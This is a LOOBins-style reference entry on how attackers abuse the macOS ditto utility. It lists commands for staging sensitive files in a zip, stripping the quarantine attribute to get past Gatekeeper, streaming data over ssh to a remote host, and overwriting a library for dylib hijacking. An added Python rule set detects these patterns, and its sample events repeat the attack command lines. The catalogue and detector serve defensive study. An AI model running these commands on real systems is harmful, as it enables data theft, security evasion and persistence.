ditto
Created by Brendan Chamberlain (@infosecB)
Description
ditto is a command line utility that copies files and directories while preserving file attributes and permissions, and that can also create and extract CPIO and PKZip archives. Attackers can use it to collect and compress sensitive data, stream that data to a remote host over ssh, strip the com.apple.quarantine extended attribute to evade Gatekeeper, and replace a legitimate dynamic library with a malicious one (dylib hijacking or binary replacement) while keeping the file's permissions and attributes intact.
Created | Tactics | Tags |
---|---|---|
2023-05-04 | Collection, Exfiltration, Lateral Movement, Defense Evasion, Persistence | files, compress, recursive |
Paths
/usr/bin/ditto
Use Cases
Copy and compress sensitive data locally
The following command creates an archive (-c) in PKZip format (-k) from the specified folder, stores resource forks and extended attributes in a __MACOSX directory inside the archive (--sequesterRsrc), keeps the parent directory name (--keepParent), and writes the result to a zip file in /tmp.
ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip
Remove extended attributes from a file
ditto can be used to bypass Gatekeeper by stripping the "com.apple.quarantine" extended attribute. A PKZip archive created by ditto without --sequesterRsrc does not carry extended attributes, and ditto, unlike Finder and Archive Utility, does not apply quarantine to the files it extracts, so a local zip round trip leaves the bundle without the attribute:
ditto -c -k unsigned.app app.zip
ditto -x -k app.zip unsigned.app 2>/dev/null
Compare the attributes listed by xattr on the bundle before and after the round trip to confirm the flag is gone. This removes only the quarantine flag: the bundle is no more signed or notarized than before, and on Apple silicon an unsigned arm64 executable is still refused at launch.
Copy, compress, and transfer sensitive data to a remote macOS host
The following pipeline creates a CPIO archive (-c, ditto's default format) of the specified folder without resource forks (--norsrc), writes it to stdout (-), and pipes it over ssh to the remote host, where a second ditto extracts (-x) the stream from stdin into the target directory. No archive file is written to disk on the source host; the only local artefacts are the ditto and ssh processes.
ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t
Dylib hijacking / binary replacement
Replace a legitimate library with a malicious one. ditto copies the file into place while preserving permissions and extended attributes, and -V prints a status line for every file copied. The destination must be writable (the macOS system volume is sealed and read-only, so realistic targets are third-party application bundles and library directories), and overwriting a library inside a signed bundle invalidates that bundle's code signature.
ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib
Detections
- No detection content at time of writing
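The page carries no detection content, so the following is an added example and not part of LOOBins: a small rule set that parses ditto command lines and flags the four use cases above (zip staging in a temp directory, archive streamed to or from a pipe, zip round trip into an .app, and a plain copy onto a loadable library). The event schema ({"pid", "exe", "args"}), the sample events, the rule names and the hypothetical Foo.framework path are assumptions made for the example; the option names come from ditto(1).

```python
"""Heuristic rules for suspicious `ditto` executions.

Added example, not LOOBins content. Events use a hypothetical, simplified
EDR schema: {"pid": int, "exe": "/usr/bin/ditto", "args": [argv...]}.
"""
import os
import shlex

# ditto(1) accepts these with one or two leading dashes.
LONG_OPTS = {"rsrc", "norsrc", "extattr", "noextattr", "qtn", "noqtn", "acl", "noacl",
             "sequesterRsrc", "keepParent", "hfsCompression", "nohfsCompression",
             "nopreserveHFSCompression"}
OPTS_WITH_ARG = {"arch", "bom", "zlibCompressionLevel"}   # these consume the next argv element

STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
LIBRARY_SUFFIXES = (".dylib", ".so", ".bundle")


def parse_ditto(argv):
    """Return (flags, positionals) for a ditto argv; combined short flags such as -ck are expanded."""
    flags, positionals = set(), []
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-" or not arg.startswith("-"):
            positionals.append(arg)          # a bare "-" means stdin/stdout, not an option
        else:
            name = arg.lstrip("-")
            if name in OPTS_WITH_ARG:
                flags.add("--" + name)
                i += 1                       # skip the option's value
            elif name in LONG_OPTS:
                flags.add("--" + name)
            else:
                flags.update("-" + ch for ch in name)
        i += 1
    return flags, positionals


def classify(argv):
    """Map one ditto argv to the list of rule names that fire (empty for a benign copy)."""
    flags, pos = parse_ditto(argv)
    hits = []
    if len(pos) < 2:
        return hits
    sources, dst = pos[:-1], pos[-1]
    creating, extracting = "-c" in flags, "-x" in flags

    # Use case 1: PKZip archive staged in a temp/shared directory (Collection).
    if creating and "-k" in flags and (dst.startswith(STAGING_DIRS) or dst.lower().endswith(".zip")):
        hits.append("ditto_zip_staging")
    # Use case 3, sending side: archive streamed to stdout, typically into ssh (Exfiltration).
    if creating and dst == "-":
        hits.append("ditto_archive_to_stdout")
    # Use case 3, receiving side: archive read from stdin (Lateral Movement).
    if extracting and "-" in sources:
        hits.append("ditto_extract_from_stdin")
    # Use case 2: zip round trip into an .app, or an explicit --noqtn, which ditto(1)
    # documents as "do not preserve quarantine information" (Defense Evasion).
    if (extracting and "-k" in flags and dst.endswith(".app")) or "--noqtn" in flags:
        hits.append("ditto_quarantine_strip")
    # Use case 4: plain copy whose destination is a loadable library (Persistence / hijack).
    if not creating and not extracting and (dst.endswith(LIBRARY_SUFFIXES) or ".framework/" in dst):
        hits.append("ditto_library_overwrite")
    return hits


def classify_command(cmdline):
    """Convenience wrapper: classify a shell-style command string."""
    return classify(shlex.split(cmdline))


def scan(events):
    """Return {pid: hits} for every ditto execution in `events` that trips at least one rule."""
    findings = {}
    for ev in events:
        if os.path.basename(ev["exe"]) != "ditto":
            continue
        hits = classify(ev["args"])
        if hits:
            findings[ev["pid"]] = hits
    return findings


# Constructed sample telemetry (not real logs), mirroring the use cases on this page.
SAMPLE_EVENTS = [
    {"pid": 101, "exe": "/usr/bin/ditto",
     "args": shlex.split("ditto -c -k --sequesterRsrc --keepParent /Users/user/sensitive-files /tmp/l00t.zip")},
    {"pid": 102, "exe": "/usr/bin/ditto", "args": shlex.split("ditto -x -k app.zip unsigned.app")},
    {"pid": 103, "exe": "/usr/bin/ditto", "args": shlex.split("ditto -c --norsrc /Users/user/sensitive-files -")},
    # The receiving ditto runs on the remote host; locally only ssh is visible, so it is skipped.
    {"pid": 104, "exe": "/usr/bin/ssh", "args": shlex.split("ssh remote_host ditto -x --norsrc - /Users/user/l00t")},
    # Hypothetical framework path: framework binaries have no extension, hence the ".framework/" check.
    {"pid": 105, "exe": "/usr/bin/ditto",
     "args": shlex.split("ditto -V /tmp/malicious_library.dylib /Library/Frameworks/Foo.framework/Versions/A/Foo")},
    {"pid": 106, "exe": "/usr/bin/ditto", "args": shlex.split("ditto /Users/user/Documents /Volumes/Backup/Documents")},
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The rules key on argument shape rather than on process ancestry, so a hunting query built from them should be joined with the parent process and, for the stdout/stdin rules, with a sibling ssh or nc process; the `-` handling and the option parser matter because `ditto -ck` and `ditto -c -k` must be treated identically, and `-arch x86_64` must not be mistaken for a source path.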